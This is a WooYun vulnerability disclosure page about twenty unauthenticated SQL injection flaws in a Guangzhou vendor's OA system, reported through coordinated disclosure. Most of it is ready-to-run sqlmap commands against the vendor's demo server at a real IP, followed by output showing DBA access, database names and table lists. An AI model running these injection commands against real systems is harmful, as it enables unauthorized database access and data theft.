当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0121176
漏洞标题:
某OA系统20处高危注入打包(无需登录,DBA权限)
相关厂商:
广州市名将软件开发有限公司
漏洞作者:
goubuli
提交时间:
2015-06-17 16:35
修复时间:
2015-09-20 10:00
公开时间:
2015-09-20 10:00
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
20
漏洞状态:
已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-06-17: 细节已通知厂商并且等待厂商处理中
2015-06-22: 厂商已经确认,细节仅向厂商公开
2015-06-25: 细节向第三方安全合作伙伴开放
2015-08-16: 细节向核心白帽子及相关领域专家公开
2015-08-26: 细节向普通白帽子公开
2015-09-05: 细节向实习白帽子公开
2015-09-20: 细节向公众公开

简要描述:

RT
两种类型:GET注入和POST注入打包一起发
这么多提交的好累。。。

详细说明:

厂商:广州市名将软件开发有限公司
官网:http://oa.fg.net.cn/index.asp
官方演示demo:http://112.124.41.23:38888/
原址:http://oa.yf1668.com
demo测试,mssql注入,DBA权限。


总结一下,这个系统的注入有公开和未公开的所有罗列如下:
前人1、 WooYun: 某OA系统多处DBA权限SQL注入/目录遍历/GetShell漏洞打包
/Default.aspx
/NWorkFlow/NWorkFlowReView.aspx
/SystemManage/SystemUser.aspx
前人2、 WooYun: 某OA系统多处DBA权限SQL注入(无需登陆官方demo演示)
/Project/ProjectJinDu.aspx?ProjectName=
/Project/PingShen.aspx?ProjectName=
/Project/TuXingJinDu.aspx?ProjectName=
前人3、 WooYun: 某OA系统多处SQL注入打包
/CRM/CustomInfo.aspx?TextStr=
/NWorkFlow/NWorkToDoAdd.aspx?FormID=
/NWorkFlow/NWorkFlow.aspx?FormID=
前人4、 WooYun: 某OA系统多处sql注入漏洞
/SystemManage/BuMenInfo.aspx?Type=
/GongGao/GongGao.aspx?Type=
/WorkFlow/PublicSealLog.aspx?Type=
/NWorkFlow/NWorkToDoAdd.aspx?FormID=
/NWorkFlow/NForm.aspx?TypeID
/DocFile/TiKu.aspx?TiKuID=0&FenLeiStr=
/CRM/CustomInfo.aspx?TextStr=aaa&DropStr=UserName
/ReportCenter/Report.aspx?TypeID=0
/BBS/BanKuaiView.aspx?ID=6
/FG_Fxzl/FxzlView.aspx?TypeID=1

捡前人的漏网之鱼
他们好几都$$看起来好叼....


首先前辈提交过的,我就不提交了。。。直接提交新挖的。。。
本来想着一个一个提交的,怕审核太累,直接打包吧。。。
【无需登录声明】,url直接打开时提示登录,其实不需登陆,直接放sqlmap跑就行了。。。
=======================================================================
类型一:GET注入
注入一、

sqlmap.py -u "http://112.124.41.23:38888/DocFile/PeiXunXiaoGuo.aspx?PeiXunName=" --dbms="mssql"
PeiXunName注入


150617_2.png


注入二、

sqlmap.py -u "http://112.124.41.23:38888/Office/GuDingJiLu.aspx?GDName=" --dbms="mssql"
GDName注入


150617_3.png


注入三、

sqlmap.py -u "http://112.124.41.23:38888/DocFile/PeiXunRiJi.aspx?PeiXunName=" --dbms="mssql"
PeiXunName注入


150617_4.png


注入四、

sqlmap.py -u "http://112.124.41.23:38888/DocFile/DangAn.aspx?JuanKuName=" --dbms="mssql"
JuanKuName注入


150617_5.png


注入五、

sqlmap.py -u "http://112.124.41.23:38888/CRM/MyCustomLinkMan.aspx?CustomName=" --dbms="mssql"
CustomName注入


150617_6.png


注入六、

sqlmap.py -u "http://112.124.41.23:38888/CRM/MyCustomService.aspx?CustomName=" --dbms="mssql" --batch
CustomName注入


150617_8.png


注入七、

sqlmap.py -u "http://112.124.41.23:38888/CRM/MyCustomPrice.aspx?CustomName=" --dbms="mssql" --batch --dbs
CustomName存在注入


150617_11.png


注入八、

sqlmap.py -u "http://112.124.41.23:38888/CRM/MyCustomLinkLog.aspx?CustomName=" --dbms="mssql" --batch --dbs
CustomName存在注入


150617_13.png


注入九、

sqlmap.py -u "http://112.124.41.23:38888/CRM/MyCustomNeed.aspx?CustomName=" --dbms="mssql" --batch --dbs
CustomName存在注入


150617_15.png


注入十、

sqlmap.py -u "http://112.124.41.23:38888/CRM/MySongYang.aspx?CustomName=" --dbms="mssql" --batch
CustomName存在注入


150617_17.png


注入十一、

sqlmap.py -u "http://112.124.41.23:38888/CRM/MyCustomHate.aspx?CustomName=" --dbms="mssql" --batch
CustomName存在注入


150617_19.png


注入十二、

sqlmap.py -u "http://112.124.41.23:38888/CRM/MyCustomBack.aspx?CustomName=" --dbms="mssql" --batch
CustomName存在注入


150617_21.png


注入十三、

sqlmap.py -u "http://112.124.41.23:38888/Supply/BuyLog.aspx?OrderName=" --dbms="mssql" --batch
OrderName存在注入


150617_23.png


注入十四、

sqlmap.py -u "http://112.124.41.23:38888/Project/ShiShiRiZhi.aspx?ProjectName=" --dbms="mssql" --batch
ProjectName注入


150617_25.png


=======================================================================
类型二:POST注入
注入十五、

sqlmap.py -u "http://112.124.41.23:38888/DocFile/PeiXunXiaoGuo.aspx" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwUKMTkzNTI2NzQzNw9kFgJmD2QWBgIMDzwrAA0BAA8WBh4LXyFEYXRhQm91bmRnHglQYWdlQ291bnQCAR4LXyFJdGVtQ291bnQCAWQWAmYPZBYEAgEPD2QWBB4Lb25tb3VzZW92ZXIFQWM9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHgpvbm1vdXNlb3V0BR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYMZg9kFgICAQ8PFgIeBFRleHQFATFkZAIBD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFG1BlaVh1blhpYW9HdW9WaWV3LmFzcHg%2FSUQ9MWQWAmYPFQEEd2VlZWQCAg8PFgIfBQUEYXNkZmRkAgMPDxYCHwUFBGFzZGZkZAIEDw8WAh8FBQNhYWFkZAIFDw8WAh8FBRIyMDE1LTYtMTcgMTE6MzA6MzJkZAICDw8WAh4HVmlzaWJsZWhkZAIWDw8WAh8FBQExZGQCGA8PFgIfBQUBMWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYLBQxJbWFnZUJ1dHRvbjQFDEltYWdlQnV0dG9uMQUMSW1hZ2VCdXR0b241BQxJbWFnZUJ1dHRvbjMFDEltYWdlQnV0dG9uMgUYR1ZEYXRhJGN0bDAyJENoZWNrU2VsZWN0BQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkVEcxONql3WSIU%2B4%2FTDZGNvYKJmI%3D&TextBox1=abc&ImageButton4.x=38&ImageButton4.y=13&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDwKgy%2FmHCwLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CALu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CakO1k6SFPoFFu87ie3cqkukMEfM" -p TextBox1
TextBox1存在POST注入


150617_2_POST.png


注入十六、

sqlmap.py -u "http://112.124.41.23:38888/DocFile/PeiXunRiJi.aspx?PeiXunName=" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwUKMTkzNTI2NzQzNw9kFgJmD2QWBgIMDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIWDw8WAh4EVGV4dAUBMWRkAhgPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2TPjyZJgA6HJY1kZEWM0ukPCMHFjQ%3D%3D&TextBox1=asd&ImageButton4.x=24&ImageButton4.y=4&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgKmia%2BFDQLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3Ces3nCswGPfNJmQWqjon1bLtg8a6" -p TextBox1
TextBox1存在POST注入


150617_4_POST.png


注入十七、

sqlmap.py -u "http://112.124.41.23:38888/CRM/MyCustomLinkMan.aspx" --data "__VIEWSTATE=%2FwEPDwUKLTk2MDQ0ODA0OA9kFgJmD2QWBgIPDzwrAA0BAA8WBh4LXyFEYXRhQm91bmRnHglQYWdlQ291bnQCAR4LXyFJdGVtQ291bnQCAWQWAmYPZBYEAgEPD2QWBB4Lb25tb3VzZW92ZXIFQWM9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHgpvbm1vdXNlb3V0BR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYOZg9kFgICAQ8PFgIeBFRleHQFATFkZAIBD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFFUxpbmtNYW5WaWV3LmFzcHg%2FSUQ9MWQWAmYPFQECcXFkAgIPDxYCHwUFEuWMl%2BS6rOS4reWVhuWMu%2BiNr2RkAgMPDxYCHwUFBiZuYnNwO2RkAgQPDxYCHwUFBiZuYnNwO2RkAgUPDxYCHwUFBiZuYnNwO2RkAgYPDxYCHwUFBiZuYnNwO2RkAgIPDxYCHgdWaXNpYmxlaGRkAhkPDxYCHwUFATFkZAIbDw8WAh8FBQExZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgsFDEltYWdlQnV0dG9uNAUMSW1hZ2VCdXR0b24xBQxJbWFnZUJ1dHRvbjUFDEltYWdlQnV0dG9uMwUMSW1hZ2VCdXR0b24yBRhHVkRhdGEkY3RsMDIkQ2hlY2tTZWxlY3QFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2R7VyVW%2Fb408ZH%2BpDyGpILg53b%2BvQ%3D%3D&DropDownList1=NameStr&TextBox1=q&ImageButton4.x=28&ImageButton4.y=8&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWFwK0rdzRDQK%2FyLvNDgK7xZrYDALy89mnBQKYzMfeBgK7odeYCgKx8JufCQKtoYZCArLK5dMCAuzRsusGAtLC%2FZoEAtLCmdMIAtLC6b8LAtLCwYkKAtLC1eQCAqPMrvYIAu7%2F3eEPAtaa2eUDApXp844KApHpt48JArrtvq4CAqSy1ZYFAvqOovcJfmPyS2W4gG0jZUNNUpW7CVDp11U%3D" -p TextBox1 --dbms="mssql"
TextBox1存在POST注入


150617_7.png


注入十八、

sqlmap.py -u "http://112.124.41.23:38888/CRM/MyCustomService.aspx?CustomName=" --data "__VIEWSTATE=%2FwEPDwUKLTM5NzIxNjgwMQ9kFgJmD2QWBgIPDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIZDw8WAh4EVGV4dAUBMWRkAhsPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2S8BkbaQwqepwzG1xa90OmKzEtRtA%3D%3D&DropDownList1=CustomName&TextBox1=q&ImageButton4.x=25&ImageButton4.y=5&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWFQKJ0MejDgK%2FyLvNDgKT7pmICQLMn76zDQKVqoeMBwLn5LXaDQKtoYZCArLK5dMCAuzRsusGAtLC%2FZoEAtLCmdMIAtLC6b8LAtLCwYkKAtLC1eQCAu7%2F3eEPAtaa2eUDApXp844KApHpt48JArrtvq4CAqSy1ZYFAvqOovcJjMPUjpcSD2uhXL0soM%2FvoyHKB%2Bk%3D" --dbms="mssql" --batch -p TextBox1
TextBox1存在POST注入


150617_9.png


注入十九、

sqlmap.py -u "http://112.124.41.23:38888/CRM/MyCustomPrice.aspx?CustomName=" --dbms="mssql" --batch --dbs --data "__VIEWSTATE=%2FwEPDwUKLTcyOTk0NTY2MQ9kFgJmD2QWBgIPDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIZDw8WAh4EVGV4dAUBMWRkAhsPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2R3CEPuk8BVtprmjQA%2FdHYS%2F1UIqQ%3D%3D&DropDownList1=CustomName&TextBox1=123&ImageButton4.x=25&ImageButton4.y=1&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWFwKRkf4cAr%2FIu80OAsHD5roFApzt2fIMAuiI5OoPAumyi9IIAsexnbwBApntGQKtoYZCArLK5dMCAuzRsusGAtLC%2FZoEAtLCmdMIAtLC6b8LAtLCwYkKAtLC1eQCAu7%2F3eEPAtaa2eUDApXp844KApHpt48JArrtvq4CAqSy1ZYFAvqOovcJxDKTQYuKN3G89EdRlEZkGDujRrw%3D" -p TextBox1
TextBox1存在POST注入


150617_12.png


注入二十、

sqlmap.py -u "http://112.124.41.23:38888/DocFile/XueXiXinDeOK.aspx" --data "__VIEWSTATE=%2FwEPDwULLTEzMjg3ODIxNjkPZBYCZg9kFgYCCQ88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnRmZGQCEw8PFgIeBFRleHQFATFkZAIVDw8WAh8CBQEwZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFggFDEltYWdlQnV0dG9uNAUMSW1hZ2VCdXR0b242BQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2RA1c0O71%2FhKVKwFr3e6gqvqX%2Bj0w%3D%3D&DropDownList2=XinDeTitle&TextBox3=a&ImageButton4.x=20&ImageButton4.y=7&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDwK32tDMAwKBs4GPBwLcm7CtDQKxyuXTAgLs0Yq1BQLSwv2aBALSwqXRBQLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CfwUDbldd%2FWIXjrwQsZRZks0hoPx" --dbms="mssql" --batch -p TextBox3
TextBox3存在POST注入


150617_10.png


=======================================================================
提交这么多好累!!!
=======================================================================
跑出的数据证明:
类型一:GET注入,数据截图证明

sqlmap.py -u "http://112.124.41.23:38888/Office/GuDingJiLu.as
px?GDName=" --dbms="mssql" --batch --current-db --current-user --is-dba --dbs


GET_Data.png


current user:    'sa'


current database:    'FGOA'


current user is DBA:    True


available databases [11]:
[*] FG360
[*] FGOA
[*] FGOA_T1
[*] JWOA
[*] JYOA
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb


121张表:

Database: FGOA
[121 tables]
+-------------------------+
| dbo.ERPAnPai            |
| dbo.ERPBBSBanKuai       |
| dbo.ERPBBSTieZi         |
| dbo.ERPBaoJia           |
| dbo.ERPBaoXiao          |
| dbo.ERPBook             |
| dbo.ERPBookJieHuan      |
| dbo.ERPBuMen            |
| dbo.ERPBuyChanPin       |
| dbo.ERPBuyOrder         |
| dbo.ERPCYDIC            |
| dbo.ERPCarBaoXian       |
| dbo.ERPCarBaoYang       |
| dbo.ERPCarInfo          |
| dbo.ERPCarJiaYou        |
| dbo.ERPCarLog           |
| dbo.ERPCarShiYong       |
| dbo.ERPCarWeiHu         |
| dbo.ERPCarWeiZhang      |
| dbo.ERPContract         |
| dbo.ERPContractChanPin  |
| dbo.ERPCrmSetting       |
| dbo.ERPCustomFuWu       |
| dbo.ERPCustomHuiFang    |
| dbo.ERPCustomInfo       |
| dbo.ERPCustomNeed       |
| dbo.ERPDanWeiInfo       |
| dbo.ERPDangAn           |
| dbo.ERPFileList         |
| dbo.ERPGongGao          |
| dbo.ERPGuDing           |
| dbo.ERPGuDingJiLu       |
| dbo.ERPHuiBao           |
| dbo.ERPHuiYuan          |
| dbo.ERPJSDIC            |
| dbo.ERPJXDetails        |
| dbo.ERPJiXiao           |
| dbo.ERPJiXiaoCanShu     |
| dbo.ERPJianLi           |
| dbo.ERPJiangCheng       |
| dbo.ERPJiangChengZhiDu  |
| dbo.ERPJiaoSe           |
| dbo.ERPJinDu            |
| dbo.ERPJuanKu           |
| dbo.ERPKaoQin           |
| dbo.ERPKaoQinSetting    |
| dbo.ERPLanEmail         |
| dbo.ERPLiRun            |
| dbo.ERPLinkLog          |
| dbo.ERPLinkMan          |
| dbo.ERPMeeting          |
| dbo.ERPMianShi          |
| dbo.ERPMobile           |
| dbo.ERPNForm            |
| dbo.ERPNFormType        |
| dbo.ERPNWorkDetails     |
| dbo.ERPNWorkFlow        |
| dbo.ERPNWorkFlowBQ      |
| dbo.ERPNWorkFlowNode    |
| dbo.ERPNWorkFlowWT      |
| dbo.ERPNWorkToDo        |
| dbo.ERPNetEmail         |
| dbo.ERPOffice           |
| dbo.ERPPeiXun           |
| dbo.ERPPeiXunRiJi       |
| dbo.ERPPeiXunXiaoGuo    |
| dbo.ERPPinShen          |
| dbo.ERPProduct          |
| dbo.ERPProject          |
| dbo.ERPRedHead          |
| dbo.ERPRenShiHeTong     |
| dbo.ERPReport           |
| dbo.ERPReportType       |
| dbo.ERPRiZhi            |
| dbo.ERPSaveFileName     |
| dbo.ERPSerils           |
| dbo.ERPSheBei           |
| dbo.ERPShenPi           |
| dbo.ERPShiShi           |
| dbo.ERPShouKuan         |
| dbo.ERPSongYang         |
| dbo.ERPSupplyLink       |
| dbo.ERPSupplys          |
| dbo.ERPSystemSetting    |
| dbo.ERPTalkInfo         |
| dbo.ERPTalkOnlineUser   |
| dbo.ERPTalkSetting      |
| dbo.ERPTaskFP           |
| dbo.ERPTelFile          |
| dbo.ERPTiKu             |
| dbo.ERPTiKuKaoShi       |
| dbo.ERPTiKuKaoShiJieGuo |
| dbo.ERPTiKuShiJuan      |
| dbo.ERPTiKuShiJuanSet   |
| dbo.ERPTiKuShiJuanType  |
| dbo.ERPTiKuType         |
| dbo.ERPTongXunLu        |
| dbo.ERPTouSu            |
| dbo.ERPTreeList         |
| dbo.ERPUser             |
| dbo.ERPUserDesk         |
| dbo.ERPVote             |
| dbo.ERPWorkPlan         |
| dbo.ERPWorkRiZhi        |
| dbo.ERPXCDetails        |
| dbo.ERPXinChou          |
| dbo.ERPXinChouCanShu    |
| dbo.ERPXueXi            |
| dbo.ERPXueXiXinDe       |
| dbo.ERPYinZhang         |
| dbo.ERPYinZhangLog      |
| dbo.FGOA_Fxzl           |
| dbo.FGOA_FxzlHit        |
| dbo.FGOA_FxzlType       |
| dbo.FGOA_NetDisk        |
| dbo.FGOA_PlugIn         |
| dbo.View_1              |
| dbo.dtproperties        |
| dbo.fgoa_mobile_msg     |
| dbo.sysconstraints      |
| dbo.syssegments         |
+-------------------------+


=======================================================================
类型二:POST注入,数据截图证明

sqlmap.py -u "http://112.124.41.23:38888/DocFile/PeiXunRiJi.aspx?PeiXunName=" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwUKMTkzNTI2NzQzNw9kFgJmD2QWBgIMDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIWDw8WAh4EVGV4dAUBMWRkAhgPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2TPjyZJgA6HJY1kZEWM0ukPCMHFjQ%3D%3D&TextBox1=asd&ImageButton4.x=24&ImageButton4.y=4&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgKmia%2BFDQLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3Ces3nCswGPfNJmQWqjon1bLtg8a6" -p TextBox1 --dbs


current user:    'sa'


current database:    'FGOA'


current user is DBA:    True


POST_Data.png


数据库:

web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[16:13:20] [INFO] fetching database names
available databases [11]:
[*] FG360
[*] FGOA
[*] FGOA_T1
[*] JWOA
[*] JYOA
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb

漏洞证明:

main.png


main1.png


注入在上面已证明

修复方案:

过滤+升级程序然后补丁

版权声明:转载请注明来源 goubuli@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-22 09:58

厂商回复:

cnvd确认并复现所述情况,已由cnvd通过公开联系渠道向软件生产厂商通报,由其后续协调网站管理单位处置。

最新状态:

暂无